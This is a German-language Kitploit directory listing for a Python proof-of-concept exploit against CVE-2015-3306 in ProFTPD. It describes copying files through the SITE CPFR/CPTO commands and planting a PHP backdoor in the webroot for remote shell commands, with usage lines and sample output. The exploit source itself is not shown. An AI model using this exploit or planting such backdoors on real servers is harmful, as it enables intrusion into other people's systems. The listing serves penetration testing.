Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-3306 — Python-PoC-Exploit für CVE-2015-3306 ProFTPD Directory Traversal. Kopiert Dateien und platziert eine PHP-Backdoor in das Webroot für Remote-Befehlsausführung über SITE CPFR/CPTO-FTP-Befehle. | Kitploit
Tools/GitHubGitHub/donmedfor/cve-2015-3306
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Python-PoC-Exploit für CVE-2015-3306 ProFTPD Directory Traversal. Kopiert Dateien und platziert eine PHP-Backdoor in das Webroot für Remote-Befehlsausführung über SITE CPFR/CPTO-FTP-Befehle.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2015-3306 ProFTPD Exploit

Dieses Repository enthält einen Python-Proof-of-Concept (PoC)-Exploit für CVE-2015-3306

⚠️ Warnung: Verwenden Sie dies nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben. Unbefugte Ausnutzung ist illegal.


Autor

Mohamed EL-KHAROUATI


Teil 1: CVE-2015-3306 ProFTPD Exploit

Beschreibung

CVE-2015-3306 ist eine Directory-Traversal-Schwachstelle in ProFTPD 1.3.5b und früheren Versionen. Dieser Exploit ermöglicht das Kopieren beliebiger Dateien und das Platzieren einer PHP-Hintertür im Webroot. Die Hintertür kann beliebige Shell-Befehle ausführen.

Funktionen

  • Nutzt die Directory-Traversal-Schwachstelle über die FTP-Befehle SITE CPFR/CPTO aus.
  • Platziert eine PHP-Hintertür (backdoor.php) im angegebenen Webroot.
  • Führt beliebige Shell-Befehle über die Hintertür aus.
  • Unterstützt benutzerdefinierte Befehle über --rcommand.
  • Anforderungen

    • Python 3.x
    • requests-Bibliothek (pip install requests)

    Verwendung, Ausgabe und Bereinigung (Ein einzelner Codeblock)

    root@kitploit:~
    # Exploit ausführen
    python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
    
    # Beispiel:
    python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
    
    # Erwartete Ausgabe:
    [+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
    [+] Exploiting <target_ip> 
    [+] Running Command whoami
    [+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
    [+] Running whoami: www-data
    [+] Done
    
    Tool herunterladen